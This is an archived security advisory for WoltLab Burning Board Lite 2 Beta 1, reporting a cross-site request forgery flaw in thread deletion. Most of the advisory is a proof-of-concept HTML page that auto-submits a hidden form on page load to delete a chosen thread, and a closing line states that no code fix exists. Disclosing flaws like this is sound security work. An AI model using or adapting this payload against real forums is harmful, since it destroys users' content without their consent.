WoltLab Burning Board Lite 2 Beta 1 Thread Delete CSRF Vulnerability

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 

####################################################################
WoltLab Burning Board Lite 2 Beta 1 Thread Delete CSRF Vulnerability
Vendor: woltlab.de
Version: Lite 2 Beta 1 (Released: March 6 2008)
Bug found by NBBN on March 8 2008
####################################################################


::Example
<html><head></head><body onLoad="javascript:document.attack.submit()">
<form action="http://site.tld/wbblite/index.php"; method="POST" name="attack">
<input type="hidden" name="action" value="ThreadDelete">
<input type="hidden" name="threadID" value="[ID of the thread]">
<input type="hidden" name="x" value="2">
<input type="hidden" name="y" value="8">
</form>
</body>
</html>

::Fix

No codefix
[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux